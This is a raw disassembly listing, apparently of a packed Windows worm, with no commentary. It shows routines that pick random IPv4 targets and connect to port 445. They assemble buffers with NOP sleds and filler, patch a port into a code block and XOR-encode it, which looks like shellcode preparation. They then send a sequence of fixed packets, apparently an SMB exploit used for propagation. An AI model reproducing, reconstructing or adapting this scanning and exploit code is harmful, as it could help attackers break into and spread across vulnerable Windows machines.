loc_404504: ; CODE XREF: sub_403950+8A�j
; sub_403950+108�j ...
mov edx, [ebp+var_E40]
push edx
call sub_4198AE
add esp, 4
loc_404513: ; CODE XREF: sub_403950+43�j
; DATA XREF: sub_40452C�o
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov ecx, [ebp+var_14]
call sub_4192B6
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_403950 endp
; =============== S U B R O U T I N E =======================================
sub_40452C proc near ; DATA XREF: UPX0:00426318�o
mov eax, offset loc_404513
retn
sub_40452C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_404540 proc near ; CODE XREF: sub_4057A0+10�p
; sub_4057A0+1B�p ...
mov eax, ecx
xor ecx, ecx
mov [eax], ecx
mov [eax+4], ecx
mov [eax+8], ecx
mov [eax+0Ch], ecx
retn
sub_404540 endp
; =============== S U B R O U T I N E =======================================
sub_404550 proc near ; CODE XREF: sub_405940+24�p
; sub_405940+35�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
mov esi, [esp+8+arg_4]
push edi
push esi
call sub_419DCB
mov edx, [esp+10h+arg_0]
mov ecx, esi
mov ebx, ecx
mov edi, eax
shr ecx, 2
mov [edx], edi
xor eax, eax
rep stosd
mov ecx, ebx
add esp, 4
and ecx, 3
rep stosb
pop edi
mov [edx+4], esi
xor eax, eax
pop esi
mov [edx+8], eax
mov [edx+0Ch], eax
pop ebx
retn
sub_404550 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_404590 proc near ; CODE XREF: sub_405880+46�p
; sub_405880+52�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov eax, [eax]
test eax, eax
jz short locret_4045A3
mov [esp+arg_0], eax
jmp sub_419DDD
; ---------------------------------------------------------------------------
locret_4045A3: ; CODE XREF: sub_404590+8�j
retn
sub_404590 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4045B0 proc near ; CODE XREF: UPX0:00406FE2�p
; sub_40B060+6B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
mov edx, [esp+arg_8]
push ebx
mov ebx, [eax+0Ch]
push esi
mov esi, [esp+8+arg_4]
push edi
mov edi, [eax]
add edi, ebx
mov ecx, edx
mov ebx, ecx
shr ecx, 2
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
mov ecx, [eax+0Ch]
pop edi
add ecx, edx
pop esi
mov [eax+0Ch], ecx
pop ebx
retn
sub_4045B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4045F0 proc near ; CODE XREF: sub_412210+375�p
; sub_412860+3A8�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_0]
mov ecx, [esp+arg_8]
mov eax, [edx+0Ch]
push esi
push edi
mov edi, [edx+8]
lea esi, [edi+ecx]
cmp esi, eax
jbe short loc_40460B
sub eax, edi
jmp short loc_40460D
; ---------------------------------------------------------------------------
loc_40460B: ; CODE XREF: sub_4045F0+15�j
mov eax, ecx
loc_40460D: ; CODE XREF: sub_4045F0+19�j
test eax, eax
jg short loc_404617
pop edi
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_404617: ; CODE XREF: sub_4045F0+1F�j
mov esi, [edx]
push ebx
add esi, edi
mov edi, [esp+0Ch+arg_4]
mov ecx, eax
mov ebx, ecx
shr ecx, 2
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
mov ecx, [edx+8]
pop ebx
add ecx, eax
pop edi
mov [edx+8], ecx
pop esi
retn
sub_4045F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_404640 proc near ; CODE XREF: sub_416780+9�p
; sub_416780+11�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
mov eax, [esp+arg_0]
mov ecx, [eax]
mov edx, [eax+0Ch]
push ebx
mov bl, [esp+4+arg_4]
mov [ecx+edx], bl
inc dword ptr [eax+0Ch]
pop ebx
retn
sub_404640 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_404660 proc near ; CODE XREF: sub_402550+1BB�p
; sub_402550+1D2�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push 4
push offset loc_428F64
mov ecx, offset off_42AE60
call sub_406AE0
push eax
mov eax, [esp+8+arg_4]
push eax
call sub_41A09A
mov esi, eax
add esp, 8
test esi, esi
jz short loc_4046A2
mov eax, [esp+4+arg_0]
mov ecx, [eax+0Ch]
mov edx, [eax]
push esi
push 1
push ecx
push edx
call sub_419FF2
push esi
call sub_419E9A
add esp, 14h
loc_4046A2: ; CODE XREF: sub_404660+24�j
pop esi
retn
sub_404660 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4046B0 proc near ; CODE XREF: sub_40C7C0+DF�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov [ecx+8], eax
mov dword ptr [ecx+4], 1
retn 4
sub_4046B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4046D0 proc near ; CODE XREF: sub_40C950+1E2�p
mov eax, [ecx]
mov eax, [eax+0Ch]
test eax, eax
push ebp
push edi
jnz short loc_4046DF
xor ebp, ebp
jmp short loc_4046EB
; ---------------------------------------------------------------------------
loc_4046DF: ; CODE XREF: sub_4046D0+9�j
xor edx, edx
loc_4046E1: ; CODE XREF: sub_4046D0+17�j
mov eax, [eax+4]
inc edx
test eax, eax
jnz short loc_4046E1
mov ebp, edx
loc_4046EB: ; CODE XREF: sub_4046D0+D�j
xor edi, edi
test ebp, ebp
jle short loc_404727
push ebx
push esi
loc_4046F3: ; CODE XREF: sub_4046D0+53�j
mov esi, [ecx]
mov eax, [esi+0Ch]
test eax, eax
jz short loc_404720
mov edx, 1
cmp edi, edx
jl short loc_404714
mov ebx, [esi+10h]
loc_404708: ; CODE XREF: sub_4046D0+42�j
cmp eax, ebx
jz short loc_404720
mov eax, [eax+4]
inc edx
cmp edx, edi
jle short loc_404708
loc_404714: ; CODE XREF: sub_4046D0+33�j
mov [esi+18h], eax
mov eax, [eax]
mov dword ptr [eax+18h], 1
loc_404720: ; CODE XREF: sub_4046D0+2A�j
; sub_4046D0+3A�j
inc edi
cmp edi, ebp
jl short loc_4046F3
pop esi
pop ebx
loc_404727: ; CODE XREF: sub_4046D0+1F�j
pop edi
pop ebp
retn
sub_4046D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_404730 proc near ; CODE XREF: sub_40C950+1DA�p
; sub_40C950+1EA�p
var_4 = dword ptr -4
push ecx
mov edx, ecx
mov eax, [edx]
mov eax, [eax+0Ch]
test eax, eax
push ebp
push edi
mov [esp+0Ch+var_4], edx
jnz short loc_404746
xor ebp, ebp
jmp short loc_404752
; ---------------------------------------------------------------------------
loc_404746: ; CODE XREF: sub_404730+10�j
xor ecx, ecx
loc_404748: ; CODE XREF: sub_404730+1E�j
mov eax, [eax+4]
inc ecx
test eax, eax
jnz short loc_404748
mov ebp, ecx
loc_404752: ; CODE XREF: sub_404730+14�j
xor edi, edi
test ebp, ebp
jle short loc_4047AC
push ebx
mov ebx, dword_424068
push esi
jmp short loc_404766
; ---------------------------------------------------------------------------
loc_404762: ; CODE XREF: sub_404730+78�j
mov edx, [esp+14h+var_4]
loc_404766: ; CODE XREF: sub_404730+30�j
mov edx, [edx]
mov eax, [edx+0Ch]
test eax, eax
jz short loc_4047A5
mov ecx, 1
cmp edi, ecx
jl short loc_40478C
mov esi, [edx+10h]
jmp short loc_404780
; ---------------------------------------------------------------------------
align 10h
loc_404780: ; CODE XREF: sub_404730+4B�j
; sub_404730+5A�j
cmp eax, esi
jz short loc_4047A5
mov eax, [eax+4]
inc ecx
cmp ecx, edi
jle short loc_404780
loc_40478C: ; CODE XREF: sub_404730+46�j
mov [edx+18h], eax
mov esi, [eax]
push 493E0h
mov ecx, esi
call sub_419020
mov eax, [esi+8]
push 0
push eax
call ebx ; TerminateThread
loc_4047A5: ; CODE XREF: sub_404730+3D�j
; sub_404730+52�j
inc edi
cmp edi, ebp
jl short loc_404762
pop esi
pop ebx
loc_4047AC: ; CODE XREF: sub_404730+26�j
pop edi
pop ebp
pop ecx
retn
sub_404730 endp
; =============== S U B R O U T I N E =======================================
sub_4047B0 proc near ; CODE XREF: sub_40C480+226�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
push edi
mov esi, ecx
xor edi, edi
push 1Ch
mov [esi+4], edi
mov [esi+0Ch], eax
call sub_4191C1
add esp, 4
cmp eax, edi
jz short loc_4047ED
mov [eax+4], edi
mov [eax+8], edi
mov [eax+0Ch], edi
mov [eax+10h], edi
mov [eax+18h], edi
mov dword ptr [eax+14h], 1
mov [esi], eax
pop edi
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
loc_4047ED: ; CODE XREF: sub_4047B0+1C�j
mov [esi], edi
pop edi
mov eax, esi
pop esi
retn 4
sub_4047B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_404800 proc near ; CODE XREF: sub_40C950+136�p
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_118 = byte ptr -118h
var_114 = dword ptr -114h
var_110 = byte ptr -110h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push 0FFFFFFFFh
push offset SEH_404800
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 114h
mov eax, dword_42A290
push ebx
mov ebx, ecx
mov [esp+124h+var_10], eax
mov eax, [ebx+4]
test eax, eax
jz short loc_40485A
push 100h
lea eax, [esp+128h+var_110]
push eax
call dword_424278 ; gethostname
test eax, eax
jnz short loc_40485A
lea ecx, [esp+124h+var_110]
push ecx
call dword_42427C ; gethostbyname
mov ecx, eax
test ecx, ecx
mov [esp+124h+var_11C], ecx
jnz short loc_404861
loc_40485A: ; CODE XREF: sub_404800+2F�j
; sub_404800+43�j
xor eax, eax
jmp loc_4049E0
; ---------------------------------------------------------------------------
loc_404861: ; CODE XREF: sub_404800+58�j
mov eax, [ecx+0Ch]
mov edx, [eax]
push ebp
push esi
xor ebp, ebp
test edx, edx
push edi
jz loc_40491D
loc_404873: ; CODE XREF: sub_404800+113�j
mov eax, [eax+ebp*4]
mov edi, offset byte_4243C3
mov esi, eax
mov ecx, 1
xor edx, edx
repe cmpsb
jz loc_404919
mov eax, [eax]
push 1434h
mov dword ptr [esp+134h+var_118], eax
call sub_4191C1
add esp, 4
mov [esp+130h+var_120], eax
test eax, eax
mov [esp+130h+var_4], 0
jz short loc_4048C1
mov ecx, [ebx+0Ch]
push ecx
mov ecx, eax
call sub_404A40
mov esi, eax
jmp short loc_4048C3
; ---------------------------------------------------------------------------
loc_4048C1: ; CODE XREF: sub_404800+B0�j
xor esi, esi
loc_4048C3: ; CODE XREF: sub_404800+BF�j
mov eax, [ebx+8]
lea edx, [esp+130h+var_118]
push edx
push eax
mov ecx, esi
mov [esp+138h+var_4], 0FFFFFFFFh
call sub_404D20
push 1
mov ecx, esi
call sub_419070
mov ecx, [ebx]
push 0
push esi
call sub_410740
call sub_419853
cdq
mov ecx, 63h
idiv ecx
push edx
call dword_42408C ; Sleep
mov edx, [esp+130h+var_11C]
mov eax, [edx+0Ch]
mov ecx, [eax+ebp*4+4]
inc ebp
test ecx, ecx
jnz loc_404873
loc_404919: ; CODE XREF: sub_404800+86�j
mov ecx, [esp+130h+var_11C]
loc_40491D: ; CODE XREF: sub_404800+6D�j
lea eax, [ebp+0Ah]
cmp ebp, eax
jge loc_4049DB
sub eax, ebp
mov [esp+130h+var_120], eax
add ebp, eax
jmp short loc_404936
; ---------------------------------------------------------------------------
loc_404932: ; CODE XREF: sub_404800+1D5�j
mov ecx, [esp+130h+var_11C]
loc_404936: ; CODE XREF: sub_404800+130�j
mov eax, [ecx+0Ch]
mov ecx, [eax]
mov edx, [ecx]
push 1434h
mov dword ptr [esp+134h+var_118], edx
call sub_4191C1
add esp, 4
mov [esp+130h+var_114], eax
test eax, eax
mov [esp+130h+var_4], 1
jz short loc_404970
mov ecx, [ebx+0Ch]
push ecx
mov ecx, eax
call sub_404A40
mov edi, eax
jmp short loc_404972
; ---------------------------------------------------------------------------
loc_404970: ; CODE XREF: sub_404800+15F�j
xor edi, edi
loc_404972: ; CODE XREF: sub_404800+16E�j
mov edx, [ebx+8]
push edx
mov ecx, edi
mov [esp+134h+var_4], 0FFFFFFFFh
call sub_404D70
push 1
mov ecx, edi
call sub_419070
mov esi, [ebx]
push 0Ch
call sub_4191C1
xor ecx, ecx
add esp, 4
cmp eax, ecx
jz short loc_4049AB
mov [eax+4], ecx
mov [eax+8], ecx
jmp short loc_4049AD
; ---------------------------------------------------------------------------
loc_4049AB: ; CODE XREF: sub_404800+1A1�j
xor eax, eax
loc_4049AD: ; CODE XREF: sub_404800+1A9�j
mov [eax], edi
cmp [esi+0Ch], ecx
jnz short loc_404A02
mov [esi+0Ch], eax
loc_4049B7: ; CODE XREF: sub_404800+213�j
mov [esi+10h], eax
loc_4049BA: ; CODE XREF: sub_404800+218�j
mov [esi+18h], eax
call sub_419853
cdq
mov ecx, 63h
idiv ecx
push edx
call dword_42408C ; Sleep
dec [esp+130h+var_120]
jnz loc_404932
loc_4049DB: ; CODE XREF: sub_404800+122�j
pop edi
pop esi
mov eax, ebp
pop ebp
loc_4049E0: ; CODE XREF: sub_404800+5C�j
mov ecx, [esp+124h+var_C]
mov large fs:0, ecx
mov ecx, [esp+124h+var_10]
pop ebx
call sub_4192B6
add esp, 120h
retn
; ---------------------------------------------------------------------------
loc_404A02: ; CODE XREF: sub_404800+1B2�j
mov ecx, [esi+10h]
mov edx, [ecx+4]
test edx, edx
mov [ecx+4], eax
mov [eax+8], ecx
mov [eax+4], edx
jz short loc_4049B7
mov [edx+8], eax
jmp short loc_4049BA
sub_404800 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_404A20 proc near ; CODE XREF: sub_40CBE0+71�p
push esi
mov esi, [ecx]
test esi, esi
jz short loc_404A37
mov ecx, esi
call sub_408720
push esi
call sub_41930D
add esp, 4
loc_404A37: ; CODE XREF: sub_404A20+5�j
pop esi
retn
sub_404A20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_404A40 proc near ; CODE XREF: sub_404800+B8�p
; sub_404800+167�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
call sub_418F60
mov ecx, [esp+4+arg_0]
xor eax, eax
mov [esi+1Ch], eax
mov [esi+20h], eax
mov [esi+18h], eax
mov [esi+1428h], eax
mov dword ptr [esi], offset off_424428
mov [esi+1430h], ecx
mov eax, esi
pop esi
retn 4
sub_404A40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_404A70 proc near ; CODE XREF: UPX0:00404D03�p
mov dword ptr [ecx], offset off_424428
jmp sub_418F90
sub_404A70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_404A80 proc near ; CODE XREF: sub_405390+5D�p
push esi
mov esi, ecx
call sub_419853
and eax, 800000FFh
jns short loc_404A96
dec eax
or eax, 0FFFFFF00h
inc eax
loc_404A96: ; CODE XREF: sub_404A80+D�j
mov [esi+24h], al
call sub_419853
and eax, 800000FFh
jns short loc_404AAC
dec eax
or eax, 0FFFFFF00h
inc eax
loc_404AAC: ; CODE XREF: sub_404A80+23�j
mov [esi+25h], al
call sub_419853
and eax, 800000FFh
jns short loc_404AC2
dec eax
or eax, 0FFFFFF00h
inc eax
loc_404AC2: ; CODE XREF: sub_404A80+39�j
mov [esi+26h], al
call sub_419853
and eax, 800000FFh
jns short loc_404AD8
dec eax
or eax, 0FFFFFF00h
inc eax
loc_404AD8: ; CODE XREF: sub_404A80+4F�j
mov [esi+27h], al
mov al, [esi+24h]
test al, al
jnz short loc_404B55
loc_404AE2: ; CODE XREF: sub_404A80+D3�j
cmp byte ptr [esi+24h], 7Fh
jz short loc_404AF6
mov al, [esi+25h]
test al, al
jz short loc_404AF6
mov al, [esi+26h]
test al, al
jnz short loc_404B55
loc_404AF6: ; CODE XREF: sub_404A80+66�j
; sub_404A80+6D�j
call sub_419853
and eax, 800000FFh
jns short loc_404B09
dec eax
or eax, 0FFFFFF00h
inc eax
loc_404B09: ; CODE XREF: sub_404A80+80�j
mov [esi+24h], al
call sub_419853
and eax, 800000FFh
jns short loc_404B1F
dec eax
or eax, 0FFFFFF00h
inc eax
loc_404B1F: ; CODE XREF: sub_404A80+96�j
mov [esi+25h], al
call sub_419853
and eax, 800000FFh
jns short loc_404B35
dec eax
or eax, 0FFFFFF00h
inc eax
loc_404B35: ; CODE XREF: sub_404A80+AC�j
mov [esi+26h], al
call sub_419853
and eax, 800000FFh
jns short loc_404B4B
dec eax
or eax, 0FFFFFF00h
inc eax
loc_404B4B: ; CODE XREF: sub_404A80+C2�j
mov [esi+27h], al
mov al, [esi+24h]
test al, al
jz short loc_404AE2
loc_404B55: ; CODE XREF: sub_404A80+60�j
; sub_404A80+74�j
pop esi
retn
sub_404A80 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_404B60 proc near ; CODE XREF: sub_404DB0+585�p
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
sub esp, 118h
mov eax, dword_42A290
push esi
push edi
push 0
push 1
push 2
mov [esp+12Ch+var_4], eax
mov edi, ecx
call dword_424260 ; socket
mov edx, [esp+120h+arg_4]
mov esi, eax
mov eax, [esp+120h+arg_0]
mov ecx, [eax]
push edx
mov [esp+124h+var_14], 2
mov [esp+124h+var_10], ecx
call dword_424264 ; htons
push 14Dh
mov [esp+124h+var_12], ax
call dword_42408C ; Sleep
push 10h
lea eax, [esp+124h+var_14]
push eax
push esi
call dword_424268 ; connect
test eax, eax
jz short loc_404BF4
push esi
call dword_42426C ; closesocket
pop edi
xor eax, eax
pop esi
mov ecx, [esp+118h+var_4]
call sub_4192B6
add esp, 118h
retn 8
; ---------------------------------------------------------------------------
loc_404BF4: ; CODE XREF: sub_404B60+72�j
push ebx
push 0
push 0
lea ecx, [esp+12Ch+var_118]
push ecx
push 0
push 0
mov [esp+138h+var_114], esi
mov [esp+138h+var_118], 1
call dword_424270 ; select
mov eax, [edi+142Ch]
xor ebx, ebx
test eax, eax
jz short loc_404C38
mov edx, [eax+658h]
mov eax, [eax+64Ch]
push ebx
push edx
push eax
push esi
call dword_424274 ; send
mov ebx, eax
loc_404C38: ; CODE XREF: sub_404B60+BE�j
push esi
call dword_42426C ; closesocket
mov ecx, [esp+124h+var_4]
mov eax, ebx
pop ebx
pop edi
pop esi
call sub_4192B6
add esp, 118h
retn 8
sub_404B60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_404C60 proc near ; CODE XREF: sub_404D20+36�p
; sub_404D70+2D�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ecx
push ebx
push ebp
push esi
mov ecx, offset word_401CDA
sub ecx, offset loc_4019C0
mov [esp+10h+var_4], ecx
mov eax, ecx
push edi
mov edi, [esp+14h+arg_0]
shr ecx, 2
mov esi, offset loc_4019C0
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, [esp+14h+arg_8]
mov ebx, offset loc_4019D7
mov ebp, offset word_401CDA
push ecx
sub ebx, offset loc_4019C0
sub ebp, offset loc_4019D7
call dword_424264 ; htons
movzx edx, ax
mov eax, [esp+14h+arg_0]
mov ecx, offset byte_401C33
sub ecx, offset loc_4019D7
add ecx, ebx
add ebx, eax
mov [ecx+eax], edx
add ebp, 0FFFFFFE9h
xor eax, eax
test ebp, ebp
jle short loc_404CEB
mov edi, edi
loc_404CD0: ; CODE XREF: sub_404C60+77�j
xor byte ptr [eax+ebx], 99h
inc eax
cmp eax, ebp
jl short loc_404CD0
mov edx, [esp+14h+arg_4]
mov eax, [esp+14h+var_4]
pop edi
pop esi
pop ebp
mov [edx], eax
pop ebx
pop ecx
retn 0Ch
; ---------------------------------------------------------------------------
loc_404CEB: ; CODE XREF: sub_404C60+6C�j
mov ecx, [esp+14h+arg_4]
mov edx, [esp+14h+var_4]
pop edi
pop esi
pop ebp
mov [ecx], edx
pop ebx
pop ecx
retn 0Ch
sub_404C60 endp
; ---------------------------------------------------------------------------
align 10h
loc_404D00: ; DATA XREF: UPX0:off_424428�o
push esi
mov esi, ecx
call sub_404A70
test byte ptr [esp+8], 1
jz short loc_404D18
push esi
call sub_41930D
add esp, 4
loc_404D18: ; CODE XREF: UPX0:00404D0D�j
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_404D20 proc near ; CODE XREF: sub_404800+D9�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov edx, [esp+arg_0]
push esi
mov esi, ecx
mov ecx, [eax]
push 0F89h
mov [esi+24h], ecx
lea eax, [esi+1428h]
push eax
lea ecx, [esi+28h]
push ecx
mov ecx, esi
mov dword ptr [esi+1Ch], 1
mov dword ptr [esi+20h], 1
mov [esi+142Ch], edx
call sub_404C60
mov dword ptr [esi+1Ch], 1
pop esi
retn 8
sub_404D20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_404D70 proc near ; CODE XREF: sub_404800+183�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
mov esi, ecx
push 0F89h
lea ecx, [esi+1428h]
push ecx
lea edx, [esi+28h]
push edx
mov ecx, esi
mov dword ptr [esi+1Ch], 1
mov dword ptr [esi+20h], 0
mov [esi+142Ch], eax
call sub_404C60
mov dword ptr [esi+1Ch], 1
pop esi
retn 4
sub_404D70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404DB0 proc near ; CODE XREF: sub_405390+9E�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = word ptr 14h
arg_10 = byte ptr 18h
arg_12 = word ptr 1Ah
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = byte ptr 28h
arg_28 = dword ptr 30h
arg_2C = dword ptr 34h
arg_30 = dword ptr 38h
arg_34 = dword ptr 3Ch
arg_38 = byte ptr 40h
arg_3C = byte ptr 44h
arg_40 = dword ptr 48h
arg_44 = dword ptr 4Ch
arg_48 = byte ptr 50h
arg_70 = byte ptr 78h
arg_73 = byte ptr 7Bh
arg_9D = byte ptr 0A5h
arg_9F = byte ptr 0A7h
arg_A0 = byte ptr 0A8h
arg_E8 = byte ptr 0F0h
arg_E9 = byte ptr 0F1h
arg_130 = byte ptr 138h
arg_168 = byte ptr 170h
arg_770 = byte ptr 778h
arg_778 = byte ptr 780h
arg_818 = byte ptr 820h
arg_F24 = byte ptr 0F2Ch
arg_F34 = byte ptr 0F3Ch
arg_F5C = byte ptr 0F64h
arg_F6C = byte ptr 0F74h
arg_1290 = byte ptr 1298h
arg_1294 = dword ptr 129Ch
arg_12A0 = byte ptr 12A8h
arg_15E8 = byte ptr 15F0h
arg_15F0 = byte ptr 15F8h
arg_1664 = byte ptr 166Ch
arg_1E34 = byte ptr 1E3Ch
arg_22DF = byte ptr 22E7h
arg_25D0 = byte ptr 25D8h
arg_25D8 = byte ptr 25E0h
arg_2640 = byte ptr 2648h
arg_3104 = byte ptr 310Ch
arg_46A8 = byte ptr 46B0h
arg_46B0 = byte ptr 46B8h
arg_46B1 = byte ptr 46B9h
arg_573C = byte ptr 5744h
arg_6398 = byte ptr 63A0h
arg_6399 = byte ptr 63A1h
arg_63A0 = byte ptr 63A8h
arg_6400 = byte ptr 6408h
arg_8470 = dword ptr 8478h
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
mov eax, 847Ch
call sub_4192D0
mov eax, dword_42A290
mov edx, [ebp+arg_0]
push ebx
mov [esp+4+arg_8470], eax
mov eax, dword_42443C
push esi
mov ebx, ecx
mov ecx, dword_424440
mov [esp+8+arg_4], eax
mov eax, [edx]
push edi
push eax
mov [esp+10h+arg_0], ebx
mov [esp+10h+arg_8], ecx
call dword_424258 ; inet_ntoa
push eax
lea ecx, [esp+4+arg_48]
push offset dword_424430
push ecx
call sub_419B8A
add esp, 0Ch
xor eax, eax
lea esp, [esp+0]
loc_404E10: ; CODE XREF: sub_404DB0+77�j
mov dl, [esp+eax+arg_48]
mov [esp+eax*2+arg_E8], dl
mov [esp+eax*2+arg_E9], 0
inc eax
cmp eax, 28h
jl short loc_404E10
mov ecx, 18h
mov esi, offset dword_428280
lea edi, [esp+arg_70]
lea eax, [esp+arg_48]
rep movsd
lea edx, [eax+1]
loc_404E40: ; CODE XREF: sub_404DB0+95�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404E40
sub eax, edx
lea ecx, [eax+eax]
mov eax, ecx
shr ecx, 2
lea esi, [esp+arg_E8]
lea edi, [esp+arg_A0]
rep movsd
mov ecx, eax
and ecx, 3
lea eax, [esp+arg_48]
rep movsb
lea edx, [eax+1]
nop
loc_404E70: ; CODE XREF: sub_404DB0+C5�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404E70
sub eax, edx
mov edx, dword_4282D7
lea ecx, [esp+eax*2+arg_9F]
mov eax, dword_4282DB
mov [ecx], edx
mov dl, byte_4282DF
mov [ecx+4], eax
lea eax, [esp+arg_48]
mov [ecx+8], dl
lea edx, [eax+1]
loc_404EA0: ; CODE XREF: sub_404DB0+F5�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404EA0
sub eax, edx
add al, 1Ah
shl al, 1
mov byte ptr [esp+arg_8+3], al
mov [esp+arg_73], al
lea eax, [esp+arg_48]
lea ecx, [eax+1]
lea esp, [esp+0]
loc_404EC0: ; CODE XREF: sub_404DB0+115�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_404EC0
sub eax, ecx
shl al, 1
add al, 9
mov [esp+arg_9D], al
lea edx, [ebx+28h]
mov ebx, [ebx+1428h]
mov eax, 90909090h
mov ecx, 36Bh
lea edi, [esp+arg_778]
rep stosd
mov eax, dword_4286FC
mov dword ptr [esp+arg_F5C], eax
mov ecx, ebx
mov eax, ecx
shr ecx, 2
mov esi, edx
lea edi, [esp+arg_F6C]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, dword_4286FC
mov [esp+arg_1294], ecx
mov ecx, ebx
shr ecx, 2
mov dword ptr [esp+arg_1290], 0E8EBEAEBh
mov esi, edx
lea edi, [esp+arg_12A0]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
xor eax, eax
jmp short loc_404F50
; ---------------------------------------------------------------------------
align 10h
loc_404F50: ; CODE XREF: sub_404DB0+196�j
; sub_404DB0+1BC�j
mov cl, [esp+eax+arg_778]
mov [esp+eax*2+arg_46B0], cl
mov [esp+eax*2+arg_46B1], 0
inc eax
cmp eax, 0E74h
jl short loc_404F50
mov ecx, 714h
mov eax, 31313131h
lea edi, [esp+arg_63A0]
rep stosd
stosw
mov ecx, 714h
mov eax, 31313131h
lea edi, [esp+arg_25D8]
rep stosd
stosw
mov eax, 90909090h
mov ecx, 1F4h
lea edi, [esp+arg_778]
rep stosd
mov ecx, ebx
mov esi, edx
mov edx, ecx
shr ecx, 2
lea edi, [esp+arg_818]
rep movsd
mov ecx, edx
and ecx, 3
lea eax, [esp+arg_10]
rep movsb
mov [esp+arg_6398], 0
mov [esp+arg_6399], 0
lea ecx, [eax+1]
jmp short loc_404FE0
; ---------------------------------------------------------------------------
align 10h
loc_404FE0: ; CODE XREF: sub_404DB0+22B�j
; sub_404DB0+235�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_404FE0
sub eax, ecx
mov ecx, eax
shr ecx, 2
lea esi, [esp+arg_10]
lea edi, [esp+arg_F34]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, dword_4286C0
mov dword ptr [esp+arg_F24], ecx
mov ecx, 38Ah
mov eax, 31313131h
lea edi, [esp+arg_15F0]
rep stosd
push 0
push 1
push 2
stosb
call dword_424260 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_405370
push 1BDh
mov [esp+10h+arg_C], 2
call dword_424264 ; htons
mov edx, [ebp+arg_0]
mov [esp+8+arg_12], ax
mov eax, [edx]
push 10h
lea edx, [esp+0Ch+arg_10]
xor ecx, ecx
push edx
mov [esp+10h+arg_18], ecx
push ebx
mov [esp+14h+arg_14], eax
mov [esp+14h+arg_1C], ecx
call dword_424268 ; connect
cmp eax, 0FFFFFFFFh
jz loc_405369
mov edi, dword_424274
push 0
push 89h
push offset dword_428060
push ebx
call edi ; send
cmp eax, 0FFFFFFFFh
jz loc_405369
mov esi, dword_42425C
push 0
push 640h
lea eax, [esp+10h+arg_130]
push eax
push ebx
call esi ; recv
push 0
push 0A8h
push offset dword_4280F0
push ebx
call edi ; send
cmp eax, 0FFFFFFFFh
jz loc_405369
push 0
push 640h
lea ecx, [esp+10h+arg_130]
push ecx
push ebx
call esi ; recv
push 0
push 0DEh
push offset dword_4281A0
push ebx
call edi ; send
